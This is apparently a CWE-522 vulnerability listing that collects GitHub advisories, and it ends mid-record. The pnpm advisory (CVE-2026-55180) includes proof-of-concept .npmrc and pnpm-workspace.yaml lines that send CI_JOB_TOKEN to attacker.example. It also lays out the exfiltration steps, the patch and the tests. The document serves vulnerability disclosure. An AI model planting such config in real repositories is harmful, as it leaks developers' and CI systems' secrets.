CWE-522
Allowed-with-ReviewInsufficiently Protected Credentials
Abstraction: Class · Status: Incomplete
The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
1820 vulnerabilities reference this CWE, most recent first.
GHSA-3Q66-2QCH-5X6M
Vulnerability from github – Published: 2026-03-06 00:31 – Updated: 2026-03-06 00:31Unnecessary transmission of sensitive cryptographic material. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.
{
"affected": [],
"aliases": [
"CVE-2026-28714"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-06T00:16:11Z",
"severity": "MODERATE"
},
"details": "Unnecessary transmission of sensitive cryptographic material. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.",
"id": "GHSA-3q66-2qch-5x6m",
"modified": "2026-03-06T00:31:35Z",
"published": "2026-03-06T00:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28714"
},
{
"type": "WEB",
"url": "https://security-advisory.acronis.com/advisories/SEC-5383"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3QCQ-28JC-G3F4
Vulnerability from github – Published: 2024-01-01 15:30 – Updated: 2024-01-08 21:30The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.
{
"affected": [],
"aliases": [
"CVE-2023-6421"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-01T15:15:43Z",
"severity": "HIGH"
},
"details": "The Download Manager WordPress plugin before 3.2.83 does not protect file download\u0027s passwords, leaking it upon receiving an invalid one.",
"id": "GHSA-3qcq-28jc-g3f4",
"modified": "2024-01-08T21:30:27Z",
"published": "2024-01-01T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6421"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/244c7c00-fc8d-4a73-bbe0-7865c621d410"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3QFF-43XR-CVVJ
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. Due to improper username validation, it allowed user impersonation with trivial manipulations of certain characters within a given username. An ordinary user may be able to login as a "bureaucrat user" who has a similar username, as demonstrated by usernames that differ only in (1) bidirectional override symbols or (2) blank space.
{
"affected": [],
"aliases": [
"CVE-2020-35623"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-21T23:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. Due to improper username validation, it allowed user impersonation with trivial manipulations of certain characters within a given username. An ordinary user may be able to login as a \"bureaucrat user\" who has a similar username, as demonstrated by usernames that differ only in (1) bidirectional override symbols or (2) blank space.",
"id": "GHSA-3qff-43xr-cvvj",
"modified": "2022-05-24T17:37:10Z",
"published": "2022-05-24T17:37:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35623"
},
{
"type": "WEB",
"url": "https://github.com/CWRUChielLab/CASAuth/pull/11"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T263498"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-3QHV-2RGH-X77R
Vulnerability from github – Published: 2026-06-26 23:12 – Updated: 2026-06-26 23:12Maintainer Action Plan
This report is ready to review with the shared patch branch. Start with the PR and the expected fixed behavior, then use the detailed exploit narrative below only if you want to replay the original path.
- Advisory:
CAND-PNPM-122/GHSA-3qhv-2rgh-x77r - Advisory URL: https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r
- Shared patch PR: https://github.com/pnpm/pnpm-ghsa-j2hc-m6cf-6jm8/pull/1
- Shared patch branch:
security/ghsa-batch-2026-06-09 - Patch commit:
a93449314f398cf4bdf2e28d033c02d37395ad22 - Base commit:
origin/main55a4035abf1ae3fe7208ba1f5ef43c5eff58ccec - Maintainer priority:
start-here - Component:
pnpm config/env replacement and registry auth - Patch area: project .npmrc env placeholders are not expanded into registry/auth destinations
- Affected packages:
npm:pnpm,npm:@pnpm/config.reader,rust:pacquet - CWE IDs:
CWE-201,CWE-200,CWE-522 - Conservative CVSS:
6.5/CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N - Next action: review the shared patch branch for this component, set the final affected version range, merge and release the fix, then publish or close the advisory.
Expected Patched Behavior
Project .npmrc environment placeholders do not expand into registry or auth destinations; the secret is absent from the request URL and auth header.
Files And Tests To Review
config/reader/src/loadNpmrcFiles.tsconfig/reader/src/getOptionsFromRootManifest.tsconfig/reader/test/index.tsconfig/reader/test/getOptionsFromRootManifest.test.tspacquet/crates/config/src/npmrc_auth.rspacquet/crates/config/src/npmrc_auth/tests.rspacquet/crates/config/src/workspace_yaml.rspacquet/crates/config/src/workspace_yaml/tests.rs.changeset/sharp-registry-env-placeholders.md
Focused Validation
Run these from a checkout of the shared patch branch. They are the useful maintainer commands with machine-local artifact paths removed.
./node_modules/.bin/tsgo --build config/reader/tsconfig.json
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/index.ts -t "project \.npmrc does not expand env variables in registry URLs|project \.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \.npmrc does not expand env variables in auth values|user \.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\.yaml registries do not expand env variables|return a warning when the \.npmrc has an env variable" --runInBand
./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts
cargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib
git diff --check
cargo fmt --check
The full patched replay for the shared branch passed with all 20 candidates marked fixed. This candidate's replay evidence is results/CAND-PNPM-122-patched-result.json.
CAND-PNPM-122: Repository config can expand victim environment secrets into registry requests before scripts run
Advisory Details
Summary
pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run.
Details
The vulnerable TypeScript pnpm path was:
config/reader/src/loadNpmrcFiles.tsloaded project.npmrcand substituted environment placeholders in keys and values.config/reader/src/getOptionsFromRootManifest.tssubstituted environment placeholders inside workspaceregistry,registries, andnamedRegistriessettings.config/reader/src/index.tsmerged those expanded registry/auth values intopnpmConfig.registries,pnpmConfig.authConfig, andpnpmConfig.configByUri.resolving/npm-resolver/src/fetch.tsbuilt metadata request URLs from the selected registry.network/fetch/src/fetchFromRegistry.tsdispatched the request and attached matching auth headers before install lifecycle scripts could run.
The pacquet parity path was:
pacquet/crates/config/src/npmrc_auth.rsexpanded project.npmrcplaceholders while parsing registry URLs and auth values.pacquet/crates/config/src/workspace_yaml.rsexpanded workspace registry placeholders.pacquet/crates/resolving-npm-resolver/src/fetch_full_metadata.rsused the configured registry URL andAuthHeadersfor metadata fetches.
PoC
Repository .npmrc URL-path exfiltration:
registry=https://attacker.example/${CI_JOB_TOKEN}/
Repository .npmrc auth-header exfiltration:
registry=https://attacker.example/
//attacker.example/:_authToken=${CI_JOB_TOKEN}
Repository pnpm-workspace.yaml URL-path exfiltration:
registries:
default: https://attacker.example/${CI_JOB_TOKEN}/
namedRegistries:
work: https://attacker.example/${CI_JOB_TOKEN}/npm/
Exploit method:
- The victim checks out the repository and runs a pnpm or pacquet dependency-management command with
CI_JOB_TOKENor another sensitive environment variable present. - Before the patch, repository config expanded the placeholder to the victim secret.
- The resolver used the expanded registry or matching auth entry to construct a metadata request.
- The victim sent a request such as
https://attacker.example/<secret>/<package>orAuthorization: Bearer <secret>to the attacker-controlled endpoint.
Validation PoC:
The PoC models the pre-patch URL and Authorization-header leaks, then verifies that patched pnpm and pacquet do not keep the secret in repository-controlled registry destinations or credential values.
Impact
A malicious repository can disclose environment secrets present in a developer or CI process to a repository-selected registry before script controls apply. This can expose npm tokens, CI job tokens, OIDC helper inputs, or other conventional environment secrets if the attacker knows or guesses their names.
Affected Products
Ecosystem: npm
Package name: pnpm, @pnpm/config.reader; pacquet Rust port
Affected versions: current main before this patch, when project .npmrc or pnpm-workspace.yaml contains environment placeholders in registry request destinations or project .npmrc contains environment placeholders in registry credential values.
Patched versions: pending release containing this patch.
Severity
Severity before patch: High
Vector string before patch: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Score before patch: 7.4
Severity after patch: None
Vector string after patch: not vulnerable after patch
Score after patch: 0.0
Rationale: exploitation is remote and low complexity once a victim runs pnpm or pacquet in the malicious repository. No attacker privileges are required, but user interaction is required. The demonstrated sink is secret disclosure through outbound registry requests, not arbitrary code execution, so confidentiality is high while integrity and availability are not directly impacted by this finding. After the patch, repository-controlled registry destinations and credential values containing env placeholders are ignored, while trusted user/global/auth.ini/CLI config still expands.
Weaknesses
CWE-201: Insertion of Sensitive Information Into Sent Data
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CWE-522: Insufficiently Protected Credentials
Patch
The patch makes environment expansion trust-aware for registry requests:
- Project
.npmrcno longer expands${...}inregistry,@scope:registry, proxy URL values, URL-scoped keys such as//host/${SECRET}/:_authToken, or registry credential values such as//host/:_authToken=${SECRET}and_authToken=${SECRET}. - User
.npmrc, auth.ini, CLI, global, and environment config still support env expansion for trusted registry configuration. pnpm-workspace.yamlno longer expands${...}inregistry,registries, ornamedRegistriesURL values.- Trusted user-level auth values such as
//registry.npmjs.org/:_authToken=${NODE_AUTH_TOKEN}still expand or lossy-drop as before, preserving setup-node and OIDC trusted-publishing behavior when the.npmrcis supplied as user config. - Pacquet mirrors the same boundary with
from_project_ini()for project.npmrcand workspace registry filtering.
Changed files:
config/reader/src/loadNpmrcFiles.tsconfig/reader/src/getOptionsFromRootManifest.tsconfig/reader/test/index.tsconfig/reader/test/getOptionsFromRootManifest.test.tspacquet/crates/config/src/npmrc_auth.rspacquet/crates/config/src/npmrc_auth/tests.rspacquet/crates/config/src/workspace_yaml.rspacquet/crates/config/src/workspace_yaml/tests.rs
Changeset:
.changeset/sharp-registry-env-placeholders.md
Pacquet parity:
Ported in the same patch. Pacquet dependency-management commands now parse project .npmrc with request-destination and credential-value env expansion disabled, and drop workspace registry values containing ${...} placeholders.
Verification
Post-patch validation:
The PoC ran:
./node_modules/.bin/tsgo --build config/reader/tsconfig.json
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/index.ts -t "project \.npmrc does not expand env variables in registry URLs|project \.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \.npmrc does not expand env variables in auth values|user \.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\.yaml registries do not expand env variables|return a warning when the \.npmrc has an env variable" --runInBand
./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts
cargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib
git diff --check
Results:
- PoC pre-patch model showed
cand122-ci-job-tokenin both a request URL and a bearer auth header. - TypeScript build for
config.reader: passed. - Focused root-manifest tests: 8 passed, including workspace registry and named-registry placeholder denial.
- Focused config-reader integration tests: 10 passed, covering project
.npmrcdefault registry denial, scoped registry denial, URL-scoped-key denial, project auth-value denial, trusted user.npmrcregistry expansion, trusted user auth-value expansion/lossy fallback, and workspace registry denial. cargo fmt --check: passed.- Focused pacquet tests: 6 passed, covering project
.npmrcregistry denial, scoped registry denial, URL-scoped-key denial, auth-value denial, trusted.npmrcregistry expansion, and workspace YAML denial. git diff --check: passed.
CVSS Reassessment
The initial scan score used a repository-code-execution vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (8.8 High)
The PoC and source trace showed this finding is direct secret disclosure through registry request URLs or Authorization headers, not a code execution path. The corrected vulnerable vector is:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Corrected vulnerable score: 7.4 High.
Final score after patch: 0.0.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.34.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55180"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-201",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T23:12:25Z",
"nvd_published_at": "2026-06-25T18:16:40Z",
"severity": "MODERATE"
},
"details": "\u003c!-- maintainer-action:start --\u003e\n## Maintainer Action Plan\n\nThis report is ready to review with the shared patch branch. Start with the PR and the expected fixed behavior, then use the detailed exploit narrative below only if you want to replay the original path.\n\n- Advisory: `CAND-PNPM-122` / `GHSA-3qhv-2rgh-x77r`\n- Advisory URL: https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r\n- Shared patch PR: https://github.com/pnpm/pnpm-ghsa-j2hc-m6cf-6jm8/pull/1\n- Shared patch branch: `security/ghsa-batch-2026-06-09`\n- Patch commit: `a93449314f398cf4bdf2e28d033c02d37395ad22`\n- Base commit: `origin/main` `55a4035abf1ae3fe7208ba1f5ef43c5eff58ccec`\n- Maintainer priority: `start-here`\n- Component: `pnpm config/env replacement and registry auth`\n- Patch area: project .npmrc env placeholders are not expanded into registry/auth destinations\n- Affected packages: `npm:pnpm`, `npm:@pnpm/config.reader`, `rust:pacquet`\n- CWE IDs: `CWE-201`, `CWE-200`, `CWE-522`\n- Conservative CVSS: `6.5` / `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`\n- Next action: review the shared patch branch for this component, set the final affected version range, merge and release the fix, then publish or close the advisory.\n\n### Expected Patched Behavior\n\nProject `.npmrc` environment placeholders do not expand into registry or auth destinations; the secret is absent from the request URL and auth header.\n\n### Files And Tests To Review\n\n- `config/reader/src/loadNpmrcFiles.ts`\n- `config/reader/src/getOptionsFromRootManifest.ts`\n- `config/reader/test/index.ts`\n- `config/reader/test/getOptionsFromRootManifest.test.ts`\n- `pacquet/crates/config/src/npmrc_auth.rs`\n- `pacquet/crates/config/src/npmrc_auth/tests.rs`\n- `pacquet/crates/config/src/workspace_yaml.rs`\n- `pacquet/crates/config/src/workspace_yaml/tests.rs`\n- `.changeset/sharp-registry-env-placeholders.md`\n\n### Focused Validation\n\nRun these from a checkout of the shared patch branch. They are the useful maintainer commands with machine-local artifact paths removed.\n\n```bash\n./node_modules/.bin/tsgo --build config/reader/tsconfig.json\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/index.ts -t \"project \\.npmrc does not expand env variables in registry URLs|project \\.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \\.npmrc does not expand env variables in auth values|user \\.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\\.yaml registries do not expand env variables|return a warning when the \\.npmrc has an env variable\" --runInBand\n./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts\ncargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib\ngit diff --check\ncargo fmt --check\n```\n\nThe full patched replay for the shared branch passed with all 20 candidates marked fixed. This candidate\u0027s replay evidence is `results/CAND-PNPM-122-patched-result.json`.\n\u003c!-- maintainer-action:end --\u003e\n\n# CAND-PNPM-122: Repository config can expand victim environment secrets into registry requests before scripts run\n\n## Advisory Details\n\n### Summary\n\npnpm and pacquet expanded `${ENV_VAR}` placeholders from repository-controlled `.npmrc` and `pnpm-workspace.yaml` into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run.\n\n### Details\n\nThe vulnerable TypeScript pnpm path was:\n\n- `config/reader/src/loadNpmrcFiles.ts` loaded project `.npmrc` and substituted environment placeholders in keys and values.\n- `config/reader/src/getOptionsFromRootManifest.ts` substituted environment placeholders inside workspace `registry`, `registries`, and `namedRegistries` settings.\n- `config/reader/src/index.ts` merged those expanded registry/auth values into `pnpmConfig.registries`, `pnpmConfig.authConfig`, and `pnpmConfig.configByUri`.\n- `resolving/npm-resolver/src/fetch.ts` built metadata request URLs from the selected registry.\n- `network/fetch/src/fetchFromRegistry.ts` dispatched the request and attached matching auth headers before install lifecycle scripts could run.\n\nThe pacquet parity path was:\n\n- `pacquet/crates/config/src/npmrc_auth.rs` expanded project `.npmrc` placeholders while parsing registry URLs and auth values.\n- `pacquet/crates/config/src/workspace_yaml.rs` expanded workspace registry placeholders.\n- `pacquet/crates/resolving-npm-resolver/src/fetch_full_metadata.rs` used the configured registry URL and `AuthHeaders` for metadata fetches.\n\n### PoC\n\nRepository `.npmrc` URL-path exfiltration:\n\n```ini\nregistry=https://attacker.example/${CI_JOB_TOKEN}/\n```\n\nRepository `.npmrc` auth-header exfiltration:\n\n```ini\nregistry=https://attacker.example/\n//attacker.example/:_authToken=${CI_JOB_TOKEN}\n```\n\nRepository `pnpm-workspace.yaml` URL-path exfiltration:\n\n```yaml\nregistries:\n default: https://attacker.example/${CI_JOB_TOKEN}/\nnamedRegistries:\n work: https://attacker.example/${CI_JOB_TOKEN}/npm/\n```\n\nExploit method:\n\n1. The victim checks out the repository and runs a pnpm or pacquet dependency-management command with `CI_JOB_TOKEN` or another sensitive environment variable present.\n2. Before the patch, repository config expanded the placeholder to the victim secret.\n3. The resolver used the expanded registry or matching auth entry to construct a metadata request.\n4. The victim sent a request such as `https://attacker.example/\u003csecret\u003e/\u003cpackage\u003e` or `Authorization: Bearer \u003csecret\u003e` to the attacker-controlled endpoint.\n\nValidation PoC:\n\nThe PoC models the pre-patch URL and Authorization-header leaks, then verifies that patched pnpm and pacquet do not keep the secret in repository-controlled registry destinations or credential values.\n\n### Impact\n\nA malicious repository can disclose environment secrets present in a developer or CI process to a repository-selected registry before script controls apply. This can expose npm tokens, CI job tokens, OIDC helper inputs, or other conventional environment secrets if the attacker knows or guesses their names.\n\n## Affected Products\n\nEcosystem: npm\n\nPackage name: `pnpm`, `@pnpm/config.reader`; pacquet Rust port\n\nAffected versions: current main before this patch, when project `.npmrc` or `pnpm-workspace.yaml` contains environment placeholders in registry request destinations or project `.npmrc` contains environment placeholders in registry credential values.\n\nPatched versions: pending release containing this patch.\n\n## Severity\n\nSeverity before patch: High\n\nVector string before patch: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N`\n\nScore before patch: 7.4\n\nSeverity after patch: None\n\nVector string after patch: not vulnerable after patch\n\nScore after patch: 0.0\n\nRationale: exploitation is remote and low complexity once a victim runs pnpm or pacquet in the malicious repository. No attacker privileges are required, but user interaction is required. The demonstrated sink is secret disclosure through outbound registry requests, not arbitrary code execution, so confidentiality is high while integrity and availability are not directly impacted by this finding. After the patch, repository-controlled registry destinations and credential values containing env placeholders are ignored, while trusted user/global/auth.ini/CLI config still expands.\n\n## Weaknesses\n\nCWE-201: Insertion of Sensitive Information Into Sent Data\n\nCWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n\nCWE-522: Insufficiently Protected Credentials\n\n## Patch\n\nThe patch makes environment expansion trust-aware for registry requests:\n\n- Project `.npmrc` no longer expands `${...}` in `registry`, `@scope:registry`, proxy URL values, URL-scoped keys such as `//host/${SECRET}/:_authToken`, or registry credential values such as `//host/:_authToken=${SECRET}` and `_authToken=${SECRET}`.\n- User `.npmrc`, auth.ini, CLI, global, and environment config still support env expansion for trusted registry configuration.\n- `pnpm-workspace.yaml` no longer expands `${...}` in `registry`, `registries`, or `namedRegistries` URL values.\n- Trusted user-level auth values such as `//registry.npmjs.org/:_authToken=${NODE_AUTH_TOKEN}` still expand or lossy-drop as before, preserving setup-node and OIDC trusted-publishing behavior when the `.npmrc` is supplied as user config.\n- Pacquet mirrors the same boundary with `from_project_ini()` for project `.npmrc` and workspace registry filtering.\n\nChanged files:\n\n- `config/reader/src/loadNpmrcFiles.ts`\n- `config/reader/src/getOptionsFromRootManifest.ts`\n- `config/reader/test/index.ts`\n- `config/reader/test/getOptionsFromRootManifest.test.ts`\n- `pacquet/crates/config/src/npmrc_auth.rs`\n- `pacquet/crates/config/src/npmrc_auth/tests.rs`\n- `pacquet/crates/config/src/workspace_yaml.rs`\n- `pacquet/crates/config/src/workspace_yaml/tests.rs`\n\nChangeset:\n\n- `.changeset/sharp-registry-env-placeholders.md`\n\nPacquet parity:\n\nPorted in the same patch. Pacquet dependency-management commands now parse project `.npmrc` with request-destination and credential-value env expansion disabled, and drop workspace registry values containing `${...}` placeholders.\n\n## Verification\n\nPost-patch validation:\n\nThe PoC ran:\n\n```bash\n./node_modules/.bin/tsgo --build config/reader/tsconfig.json\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/index.ts -t \"project \\.npmrc does not expand env variables in registry URLs|project \\.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \\.npmrc does not expand env variables in auth values|user \\.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\\.yaml registries do not expand env variables|return a warning when the \\.npmrc has an env variable\" --runInBand\n./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts\ncargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib\ngit diff --check\n```\n\nResults:\n\n- PoC pre-patch model showed `cand122-ci-job-token` in both a request URL and a bearer auth header.\n- TypeScript build for `config.reader`: passed.\n- Focused root-manifest tests: 8 passed, including workspace registry and named-registry placeholder denial.\n- Focused config-reader integration tests: 10 passed, covering project `.npmrc` default registry denial, scoped registry denial, URL-scoped-key denial, project auth-value denial, trusted user `.npmrc` registry expansion, trusted user auth-value expansion/lossy fallback, and workspace registry denial.\n- `cargo fmt --check`: passed.\n- Focused pacquet tests: 6 passed, covering project `.npmrc` registry denial, scoped registry denial, URL-scoped-key denial, auth-value denial, trusted `.npmrc` registry expansion, and workspace YAML denial.\n- `git diff --check`: passed.\n\n## CVSS Reassessment\n\nThe initial scan score used a repository-code-execution vector:\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H` (8.8 High)\n\nThe PoC and source trace showed this finding is direct secret disclosure through registry request URLs or Authorization headers, not a code execution path. The corrected vulnerable vector is:\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N`\n\nCorrected vulnerable score: 7.4 High.\n\nFinal score after patch: 0.0.",
"id": "GHSA-3qhv-2rgh-x77r",
"modified": "2026-06-26T23:12:25Z",
"published": "2026-06-26T23:12:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55180"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "pnpm: Repository config can expand victim environment secrets into registry requests before scripts run"
}
GHSA-3R65-3R65-M2FX
Vulnerability from github – Published: 2022-05-24 17:10 – Updated: 2022-05-24 17:10An issue was discovered on Moxa MGate MB3170 and MB3270 devices before 4.1, MB3280 and MB3480 devices before 3.1, MB3660 devices before 2.3, and MB3180 devices before 2.1. An attacker may be able to intercept weakly encrypted passwords and gain administrative access.
{
"affected": [],
"aliases": [
"CVE-2019-9095"
],
"database_specific": {
"cwe_ids": [
"CWE-522"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-03-11T15:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered on Moxa MGate MB3170 and MB3270 devices before 4.1, MB3280 and MB3480 devices before 3.1, MB3660 devices before 2.3, and MB3180 devices before 2.1. An attacker may be able to intercept weakly encrypted passwords and gain administrative access.",
"id": "GHSA-3r65-3r65-m2fx",
"modified": "2022-05-24T17:10:45Z",
"published": "2022-05-24T17:10:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9095"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/support/security-advisory/mb3710-3180-3270-3280-3480-3660-vulnerabilities"
},
{
"type": "WEB",
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-056-01"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-3V6J-9MF5-WV3F
Vulnerability from github – Published: 2022-06-25 00:00 – Updated: 2022-07-06 00:00The default password for the web application’s root user (the vendor’s private account) was weak and the MD5 hash was used to crack the password using a widely available open-source tool.
{
"affected": [],
"aliases": [
"CVE-2022-1666"
],
"database_specific": {
"cwe_ids": [
